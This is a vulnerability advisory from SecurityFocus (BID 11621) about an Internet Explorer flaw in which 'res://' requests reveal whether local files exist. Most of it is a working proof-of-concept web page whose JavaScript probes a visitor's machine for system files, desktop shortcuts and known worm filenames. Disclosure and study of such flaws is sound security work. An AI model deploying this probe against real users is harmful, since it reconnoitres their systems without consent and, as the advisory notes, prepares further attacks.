source: https://www.securityfocus.com/bid/11621/info


Microsoft Internet Explorer is reported prone to a local resource enumeration vulnerability. It is reported that the vulnerability exists because when handling 'res://' requests for local resources, Internet explorer behavior may reveal the existence of local files.

An attacker may employ information that is harvested in this manner to aid in further attacks that are launched against a target computer.


<textarea id="btft" rows="10" cols="75">&lt;/textarea&gt;<br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="> Search >"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>